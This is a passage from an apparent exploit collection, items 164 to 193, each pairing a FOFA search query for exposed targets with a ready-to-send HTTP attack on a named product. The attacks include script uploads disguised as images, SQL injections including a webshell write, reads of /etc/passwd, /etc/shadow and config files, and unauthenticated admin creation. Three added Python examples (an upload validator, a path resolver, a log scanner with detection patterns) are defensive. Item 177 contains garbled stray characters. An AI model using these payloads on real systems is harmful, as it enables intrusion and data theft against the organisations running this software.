------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. Huixiaoyuan / Anxiaoyi (慧校园(安校易)) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

The uploaded content is then served at http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

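Every upload POC from item 155 through item 164 sends a .php/.jsp/.aspx script while declaring an image Content-Type, so the declared type is exactly the check a server must not rely on. The validator below is an added example written for this page, not code from any of the products above: it parses a multipart/form-data body with Python's standard email parser, ignores the client's Content-Type entirely, strips any client-supplied directory from the file name, and accepts a file part only when its extension is on an allowlist and its first bytes match that format. The allowlist, the magic bytes, the boundary reused from item 155 and the extra sample parts are assumptions constructed for the demonstration.

```python
"""Server-side upload validation that ignores the client's Content-Type.
Added example for this page; not code from the original post or any vendor."""
import email
import os
from email import policy

# Allowed extensions and the magic bytes the content must start with
# (assumed allowlist for the demonstration). The declared Content-Type is
# never consulted: every upload POC on this page labels a script as image/*.
ALLOWED = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}


def check_upload(filename: str, data: bytes) -> tuple[bool, str]:
    """Decide whether one uploaded file may be stored. Returns (ok, reason)."""
    # Drop any client-supplied directory part (item 161 sends "../../../../x.aspx").
    name = os.path.basename(filename.replace("\\", "/"))
    root, ext = os.path.splitext(name)
    ext = ext.lower()
    if ext not in ALLOWED:
        return False, f"extension {ext or '(none)'} not in allowlist"
    if "." in root or root == "":
        # "shell.php.png" or ".png": some servers dispatch on the first extension.
        return False, "multiple or empty file name components"
    if not data.startswith(ALLOWED[ext]):
        return False, f"content is not {ext} data"
    return True, "ok"


def validate_multipart(content_type: str, body: bytes) -> list[tuple[str, bool, str]]:
    """Parse a multipart/form-data body and check every file part.
    The stdlib email parser handles multipart/* generically, so it is reused here."""
    raw = b"Content-Type: " + content_type.encode("ascii") + b"\r\n\r\n" + body
    msg = email.message_from_bytes(raw, policy=policy.default)
    results = []
    for part in msg.iter_parts():
        filename = part.get_filename()
        if filename is None:
            continue                        # ordinary form field, not a file
        payload = part.get_payload(decode=True) or b""
        ok, reason = check_upload(filename, payload)
        results.append((filename, ok, reason))
    return results


BOUNDARY = "---------------------------qttl7vemrsold314zg0f"   # boundary from item 155


def _part(name: str, filename: str, ctype: str, data: bytes) -> bytes:
    """Build one multipart file part (helper for the constructed sample below)."""
    head = (f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="{name}"; '
            f'filename="{filename}"\r\nContent-Type: {ctype}\r\n\r\n').encode()
    return head + data + b"\r\n"


# Constructed sample body: the item 155 webshell part plus three made-up parts.
SAMPLE_CONTENT_TYPE = f"multipart/form-data; boundary={BOUNDARY}"
SAMPLE_BODY = (
    _part("file", "test.php", "image/png", b"<?php phpinfo();unlink(__FILE__);?>")
    + _part("file", "shell.php.png", "image/png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16)
    + _part("file", "fake.png", "image/png", b"<?php echo 1; ?>")
    + _part("file", "logo.png", "image/png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16)
    + f"--{BOUNDARY}--\r\n".encode()
)

if __name__ == "__main__":
    for filename, ok, reason in validate_multipart(SAMPLE_CONTENT_TYPE, SAMPLE_BODY):
        print(f"{'ACCEPT' if ok else 'REJECT':6} {filename}: {reason}")
```

Running it rejects test.php (extension), shell.php.png (double extension) and fake.png (PNG name, PHP content) and accepts only logo.png. The remaining half of the fix is storing the accepted file under a server-generated name outside the web root, which removes the "then browse to the uploaded file" step that every POC above ends with.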
165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL (truncated as published; the injection point is the sortOrder parameter): https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. Zhongcheng Kexin (中成科信) ticketing management platform SeatMapHandler SQL injection
FOFA: body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host: your-ip
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. LVS lean value management system (精益价值管理系统) DownLoad.aspx arbitrary file read
FOFA: body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. Hongjing (宏景) EHR OutputCode arbitrary file read
FOFA: app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. Hongjing (宏景) EHR downlawbase SQL injection
FOFA: app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. Hongjing (宏景) EHR DisplayExcelCustomReport arbitrary file read
FOFA: body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. Tongtianxing (通天星) CMSV6 vehicle GPS monitoring platform SQL injection
FOFA: body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD license plate recognition camera (DT-高清车牌识别摄像机) arbitrary file read
FOFA: app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point Security Gateway arbitrary file read
CVE-2024-24919
FOFA: app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. Jinher OA (金和OA) C6 FileDownLoad.aspx arbitrary file read
FOFA: app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

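Items 167, 168, 170, 172 and 174 above (and 179 and 188 further down) are all "download by path" endpoints that join a client-supplied path onto a base directory. The example below is added for this page and is not code from any of these products: it contrasts the join-then-normalise behaviour those endpoints exhibit with a resolver that refuses URL schemes, absolute paths and anything that normalises to a location outside an assumed upload root (/var/www/app/UploadFile, a hypothetical path), and runs the page's own payloads through both. One caveat it makes visible: item 167's UploadFile/../Web.Config never leaves the application directory, so a containment check only helps when the base is the narrowest directory the endpoint legitimately serves, not the web root.

```python
"""Vulnerable vs hardened resolution of a client-supplied download path.
Added example for this page; not code from any of the products listed."""
import posixpath

UPLOAD_ROOT = "/var/www/app/UploadFile"    # assumed upload directory (hypothetical)


class PathEscape(ValueError):
    """Raised when a requested path would leave the permitted directory."""


def vulnerable_resolve(base: str, user_path: str) -> str:
    """What the broken endpoints effectively do: join, then normalise.
    '..' segments walk out of base, and an absolute path discards base entirely."""
    return posixpath.normpath(posixpath.join(base, user_path))


def safe_resolve(base: str, user_path: str) -> str:
    """Resolve user_path under base or raise PathEscape.

    Rejects URL schemes (item 190's file:///etc/passwd), NUL bytes and
    absolute paths (item 188's /etc/passwd) up front, folds backslashes,
    normalises '.', '..' and repeated slashes, then requires the result
    to still sit inside base."""
    if "://" in user_path or "\x00" in user_path:
        raise PathEscape(user_path)
    normalised = user_path.replace("\\", "/")
    if normalised.startswith("/"):
        raise PathEscape(user_path)
    base = posixpath.normpath(base)
    candidate = posixpath.normpath(posixpath.join(base, normalised))
    if candidate != base and not candidate.startswith(base + "/"):
        raise PathEscape(user_path)
    return candidate


def escapes(base: str, user_path: str) -> bool:
    """True if safe_resolve rejects user_path (convenience for checks)."""
    try:
        safe_resolve(base, user_path)
    except PathEscape:
        return True
    return False


# Payloads taken from the POCs on this page.
PAGE_PAYLOADS = [
    "UploadFile/../Web.Config",            # item 167
    "../Resource/JHFileConfig.ini",        # item 174
    "../webapps/ROOT/WEB-INF/web.xml",     # item 170
    "../log4net.config",                   # item 179
    "/etc/passwd",                         # item 188
    "file:///etc/passwd",                  # item 190
]

if __name__ == "__main__":
    for p in PAGE_PAYLOADS:
        verdict = "REJECT" if escapes(UPLOAD_ROOT, p) else "ok"
        print(f"{p!r:36} join+normpath -> {vulnerable_resolve(UPLOAD_ROOT, p)!r:46} "
              f"safe_resolve -> {verdict}")
```

The output shows the join+normpath column wandering into /var/www/app and /etc for every traversal payload while safe_resolve rejects each of them; the one payload it accepts, UploadFile/../Web.Config, resolves to a harmless non-existent file under the upload root precisely because the base was chosen narrowly.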

175. Jinher OA (金和OA) C6 IncentivePlanFulfill.aspx SQL injection
FOFA: app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system (电信网关配置管理系统) rewrite.php arbitrary file upload
FOFA: body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

' y' `9 c$ n. S" L3 ^177. H3C路由器敏感信息泄露1 Q& [! A5 e% K) [
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
# i3 e# L5 Y+ t8 F5 |- V8 u: q, ?/userLogin.asp/../actionpolicy_status/../M60.cfg7 l" D6 \- C% i2 o6 Z4 N* R/ Q
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
" b) ?2 |1 r1 t7 x" H3 y+ j/userLogin.asp/../actionpolicy_status/../GR5200.cfg
1 O6 [* o; F! F7 ^/userLogin.asp/../actionpolicy_status/../GR3200.cfg  s/ c6 `, I! m6 J- m/ H: Y
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
$ n9 u. \$ H# ?. Z3 T/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg* b- ]& E9 E8 L9 `% k; S
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
- }3 f1 R: r! I8 o) P$ w; v$ X/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg% ]" ]% W: U7 `& Q
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg" F8 Y2 t# [! ?. V- e; w3 @
/userLogin.asp/../actionpolicy_status/../ER5200.cfg* q9 G! \3 c& M! T
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
, a9 V4 z8 P) g0 d" A* {) n* R6 o' P/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg" Z: q* J# t( n- O) w: I" S
/userLogin.asp/../actionpolicy_status/../ER3260.cfg: \5 ?) v/ L: Q5 ~$ c0 @; P" {
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
& A4 M0 d7 m/ Z; R/userLogin.asp/../actionpolicy_status/../ER3200.cfg
0 ]$ E+ q0 V7 [; T1 t/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg0 d) X' `% q2 g# \% n5 A/ C
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg8 Y1 Z4 h% S1 d
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
3 k! a, Z% \2 a" l9 x' _/userLogin.asp/../actionpolicy_status/../ER3100.cfg2 o& p9 ]4 F* D3 p' o" B4 j* n
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg1 `; \" L: C& V. a: W

! f: E4 o) l6 q; V: s8 H( j
178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA: header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

Then fetch the stored file (the name parameter, not the filename, becomes the stored name):
GET /imc/primepush/%2e%2e/flex/12234.txt

179. Jianwen (建文) engineering project management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. Bangguanke (帮管客) CRM jiliyu SQL injection
FOFA: app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. Runshen (润申信息科技) enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA: "PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. Runshen (润申科技) enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA: "PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. Guangzhou Tuchuang (广州图创) Interlib library cluster management system updOpuserPw SQL injection
FOFA: body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. Xunrao (迅饶科技) X2Modbus gateway AddUser arbitrary user creation
FOFA: server="SunFull-Webs"
The request body is a raw SQL INSERT that the endpoint executes as-is:
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. Realor Tianyi (瑞友天翼) application virtualization system SQL injection
Affected: version < 7.0.5.1
FOFA: app="REALOR-天翼应用虚拟化系统"
Stacked query that writes a PHP file into the web root via SELECT ... INTO OUTFILE:
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement unit for photovoltaic power systems.
FOFA: title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection (time-based variant of item 158)
CVE-2024-32640
FOFA: "Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

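For defenders who only have web-server access logs, the following is an added example (not part of the original post) that turns the request-line indicators of the POCs above into a small scanner: the TBK DVR command-injection marker of item 156, the X2Modbus /soap/AddUser endpoint of item 184 and the H3C configuration paths of item 177 are matched literally, a generic check for a decoded ../ segment covers items 160, 169, 170, 172 and 174, and a time-based SQL injection check (WAITFOR DELAY, SLEEP(, PG_SLEEP() covers items 154, 169, 171, 175, 181, 187 and 189. Indicator names are this example's own; the log lines are constructed in Apache combined format from the POC request lines. POST-body-only payloads such as Check Point's aCSHELL/../ (item 173) or Jianwen's path=../ (item 179) never reach an access log and need WAF or full-packet logging instead.

```python
"""Access-log scanner for the request-line indicators of the POCs on this page.
Added example for this page; not code from the original post or any vendor."""
import re
from urllib.parse import unquote_plus

# (indicator name, pattern) applied to the URL-decoded request target.
# Names are this example's own labels. The first three are lifted from the
# POC request lines of items 156, 184 and 177; the last two are generic and
# also catch the other traversal and time-based SQL injection items.
SIGNATURES = [
    ("tbk-dvr-cmd-injection",
     re.compile(r"/device\.rsp\?.*\bcmd=___S_O_S_T_R_E_A_MAX___", re.I)),
    ("x2modbus-adduser", re.compile(r"^/soap/AddUser(?:[/?]|$)", re.I)),
    ("h3c-config-read", re.compile(r"/userLogin\.asp/\.\./", re.I)),
    ("path-traversal", re.compile(r"(?:^|[/=\\])\.\.(?:[/\\]|$)")),
    ("time-based-sqli",
     re.compile(r"WAITFOR\s+DELAY|\bSLEEP\s*\(|\bPG_SLEEP\s*\(", re.I)),
]

# Apache/nginx "combined" format: pull out the quoted request line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def classify(target: str) -> list[str]:
    """Names of every signature that matches one request target."""
    decoded = unquote_plus(target)      # %2F -> /, %2e -> ., '+' -> ' '
    return [name for name, pat in SIGNATURES if pat.search(decoded)]


def scan(lines) -> list[tuple[int, list[str]]]:
    """(1-based line number, matched names) for each suspicious log line."""
    hits = []
    for no, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if m is None:
            continue                    # not a request line; skip it
        names = classify(m.group("target"))
        if names:
            hits.append((no, names))
    return hits


# Constructed sample log (not captured from a real host); the targets are the
# page's POC request lines, with documentation-range source addresses.
SAMPLE_LOG = """\
203.0.113.7 - - [05/Jun/2024:10:00:01 +0800] "GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1311 "-" "Mozilla/5.0"
203.0.113.7 - - [05/Jun/2024:10:00:02 +0800] "GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=id HTTP/1.1" 200 88 "-" "Mozilla/5.0"
198.51.100.2 - - [05/Jun/2024:10:00:03 +0800] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [05/Jun/2024:10:00:04 +0800] "GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1" 500 0 "-" "Mozilla/5.0"
203.0.113.7 - - [05/Jun/2024:10:00:05 +0800] "GET /userLogin.asp/../actionpolicy_status/../ER8300G2.cfg HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
203.0.113.7 - - [05/Jun/2024:10:00:06 +0800] "POST /soap/AddUser HTTP/1.1" 200 12 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for no, names in scan(SAMPLE_LOG.splitlines()):
        print(f"line {no}: {', '.join(names)}")
```

Decoding before matching is what makes the Nexus request (item 160) visible: in the raw log it contains no literal ../ at all. Run against a real log, pipe the hits into whatever ticketing you use and treat a 200 on the H3C .cfg paths or the Nexus passwd read as confirmed exposure rather than an attempt.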
188. Santi Jiahui (叁体-佳会) video conferencing attachment arbitrary file read
Affected: version <= 3.9.7
FOFA: body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技临床浏览系统 deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. 短视频矩阵营销系统 poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通电子文档安全管理系统 NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下外贸ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. 山石网科云鉴安全管理系统 setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0


POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
